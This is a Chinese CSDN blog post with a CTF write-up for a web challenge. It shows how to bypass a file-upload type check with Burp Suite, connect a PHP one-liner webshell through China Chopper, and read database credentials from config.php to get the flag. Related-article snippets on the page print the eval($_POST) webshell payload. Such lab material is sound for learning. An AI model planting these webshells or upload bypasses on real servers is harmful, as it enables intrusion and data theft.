CTF-"第三届“百越杯”福建省高校网络空间安全大赛":Do you know upload?

最新推荐文章于 2022-10-04 13:49:41 发布
最新推荐文章于 2022-10-04 13:49:41 发布
阅读量189 收藏
点赞数
文章标签: 数据库 php java laravel mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MidSummer411/article/details/111957430
版权

分值:100分 类型:Web题目名称:Do you know upload?
题目内容:https://www.ichunqiu.com/battalion?t=1&r=0

知识点

  • 使用BurpSuite绕过上传文件格式校验
  • 使用中国菜刀连接一句话🐴

操作流程

  1. 打开页面,是个上传界面.直接上传php一句话,提示文件类型不允许.
  2. 上传一句话.jpg,提交时使用Burpsuite改成php后缀,提交成功,并且返回地址"xxx/upload/one.php"
  3. 使用菜刀,连接成功,进入服务器,在上级目录可以看到个config.php和index.php,里面有数据库的账号密码
<?php
error_reporting(0);
session_start();
$servername = "localhost";
$username = "ctf";
$password = "ctfctfctf";
$database = "ctf";

// 创建连接
$conn = mysql_connect($servername,$username,$password) or die(" connect to mysql error");
mysql_select_db($database);
?>

4.使用菜刀连接上面发现的数据库

<T>MYSQL</T>
<H>localhost</H>
<U>ctf</U>
<P>ctfctfctf</P>
<L>utf8</L>

  1. 查看ctf库,拿到flag:

    image.png
Flutter&Python&Test
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF - 第二届“陇剑杯”网络安全大赛线上赛部分write up
08-26
CTF-第二届“陇剑杯”网络安全大赛线上赛部分write up 本篇文章将围绕第二届“陇剑杯”网络安全大赛线上赛的 Write-up 进行详细的讲解,从中可以学到许多实用的网络安全知识。 首先,我们来看一下第一个题目,黑客...
2020第五空间 web writeup
a3320315的博客
06-27 3329
hate-php 源码 <?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code = $_GET['code']; if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { die('You are too good for me');
[RootersCTF2019]I_<3_Flask 1&arjun爆破参数
最新发布
plant1234的博客
10-04 1578
根据测试发现有ssti模板注入。
i春秋练习——第三届“百杯”福建省高校网络空间安全大赛-web-do you know upload
wuerror的博客
01-07 549
首先是一个文件上传,比较基础。选择上传111.php,内容是一句话马<?php eval($_POST['cmd']);?> burpsuit抓包修改Content-Type为image/gif(任一种图片都行),这类漏洞可以搭建一个upload-lab本地练一练。 显示上传成功 接下来使用蚁剑连接,连接密码就是之前一句话写的cmd,编码器可以选default,这题没...
第三届“百杯”福建省高校网络空间安全大赛——WEB-Do you know upload
Ifish的博客
04-07 1143
打开链接,发现是文件上传题,所以就先按正常套路来burpsuite抓包改文件类型上传成功菜刀连上以后在config文件中得到用户名和密码得到flag这道题有很多种做法,我就不一一列举了,总之是很基础的题了...
ctf (Do_you_know_http)
Glacier_Mount的博客
06-27 2310
burp suite的简单应用
2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件
09-19
2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络...
深育杯 2021 高校组 CTF 网络安全大赛 专业竞赛 真题 zip
12-07
深育杯 2021 高校组 CTF 网络安全大赛 专业竞赛 真题
【天格】战队-已解出题目附件-第六届“强网杯”全国网络安全挑战赛
08-01
【天格】战队在第六届“强网杯”全国网络安全挑战赛中展现出卓的技能和深入的理解,这是一场集技术、策略与团队协作于一体的顶级赛事。挑战赛中的解题附件揭示了网络安全领域的多个关键知识点,涵盖了逆向工程、...
2020年第六届“湖湘杯”网络安全技能大赛洞庭决赛-互联网选拔赛-第二场-线上CTF赛.zip
11-01
【标题】: 2020年第六届“湖湘杯”网络安全技能大赛洞庭决赛-互联网选拔赛-第二场-线上CTF赛 【描述】: 这个压缩包文件包含了2020年第六届“湖湘杯”网络安全技能大赛洞庭决赛中,互联网选拔赛第二场的线上CTF...
i春秋CTF训练 Web Do you know upload
椰奶冻不安全的博客
07-02 618
Web Do you know upload? 题目内容:加油吧,少年。 题目链接请在i春秋申请 一个简单的文件上传,写个一句话命名为2.jpg,用burpsuit抓包后改为2.php上传成功 <?php @eval($_POST[cmd]);?> 返回了上传路径,用蚁剑连接此路径,密码为cmd,可成功连接 查看config.php发现数据库配置信息 <?php error_reporting(0); session_start(); $servername = "local
第三届“百杯”福建省高校网络空间安全大赛Do you know upload?Writeup
驻足
04-21 3818
推一波我的博客 Marsguest’s Blog 第三届“百杯”福建省高校网络空间安全大赛Do you know upload?Writeup 首先,直接上传一句话木马1.php文件 &lt;?php eval($_POST['cmd']);?&gt; //文件内容 发现如图弹窗 初步判断是前台直接判断文件类型,这种绕过相对简单,更改传输时文件类型即可 再次上传1.php的...
第三届“百杯”福建省高校网络空间安全大赛 Do you know upload
feng的博客
09-10 644
这是涉及文件上传和蚁剑连数据库的一个题目
第三届“百杯”福建省高校网络空间安全大赛
andiao1218的博客
03-21 647
Upload: 选择jpg后缀的一句话木马,burp开启抓包,点击Submit上传 把jpg改为php,发包,在返回包里看到马的地址 用菜刀连接 这里有个ctf.sql,但是里面没有东西,flag可能在数据库里,打开config.php 得到数据库名称ctf,账号ctf,密码ctfctfctf 上大马 登陆mysql数据库 选择...
第三届“百杯”福建省高校网络空间安全大赛Do you know upload
Naptmn的博客
11-18 444
打开之后很明显是个文件上传漏洞 当然也有可能是我层次太低看不出来还有哈别的可能 f12后也证明了这一点 虽然好像和这个include没有什么关系 尝试传一句话木马 之前做过一个带过滤的一句话木马,那个题忘记了,就想着继续按照上次的传,之后发现好像不太行,就换回了最简单的一句话木马 <?php eval($_POST['a']); ?> 上传后提示不支持此类文件格式,之后开始用bp抓包改类型 把里面的Type改为:image/jpeg 上传就成功了 或者先把一句话格式改为jpg,抓包时再
CTFHUB学习题解Web(4)-文件上传
独沐晨霖
07-28 631
注: 1.是个正在学习的新手,连脚本小子都不够格 2. 很多题目都很基础,但是都做了详细截图 3. 题库尚不完全,没有内容的分支先直接跳过,等题库更新再做添加 4. 大标题为版块名,小标题为题目名 5. 个人学习记录和复习使用,如有错误欢迎指正 文章目录无验证前端验证.htaccessMIME绕过文件头检查00截断双写后缀 无验证 无验证没啥说的,上传php脚本用蚁剑链接即可 前端验证 php文件不允许上传 查看网页源码 将脚本后缀改为.jpg上传并抓包把后缀名改回.php即可上传 用蚁剑连
CTF-Web-Do you know upload
Fisher的安全日记
11-14 772
0×00 背景迫于挖洞挖不dao,练练CTF,复习复习。 题目地址 https://www.ichunqiu.com/battalion?t=1&r=61025 0×01 审题 文件上传 0×02 文件上传 上传一个图片,成功。然后传php文件,提示文件类型错误,bp抓包,将上传类型改成image/jpeg,上传成功 0×03 菜刀连接 [外链图片转存失败,源站可能有防盗链机制,建议...
第三届“百杯”福建省高校网络空间安全大赛------------Do you know upload
大方子
08-30 713
========================== 个人收获 1.通过修改文件类型绕过上传限制   ========================= 题目:   查看源码有一个提示信息 上传图片正常,上传其他的文件会出现 典型的上传绕过,这里就只需要把文件类型content-type字段改为image/gif(在上传其他文件的时候) 然后我们上传普通的php一句...
i春秋-第三届“百杯”福建省高校网络空间安全大赛
qq_44858189的博客
07-29 2207
i春秋-第三届“百杯”福建省高校网络空间安全大赛文件上传利用菜刀连接数据库 记录一下i春秋里的一道web题,题目类型是文件上传漏洞 传送门:https://www.ichunqiu.com/battalion?t=1&r=61025 主要就两个知识点,很基础,适合新手阅读,大佬勿喷哈 文件上传 来到上传点 先上传一个正常的.jpg文件(图片中写入一句话木马) <?php eval($_POST['a']) ;?> 然后打开burp suite抓包,把后缀名jpg修改成php
04.实验吧CTF实战之WEB渗透和隐写术解密1
08-03
"网络安全自学篇, CTF实战, WEB渗透, 隐写术, Chrome浏览器, Jother编码, BurpSuite, SQLMAP, Fiddler" 在网络安全领域,尤其是对于初学者来说,了解并实践CTF(Capture The Flag)实战是一种很好的学习方式。"04....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值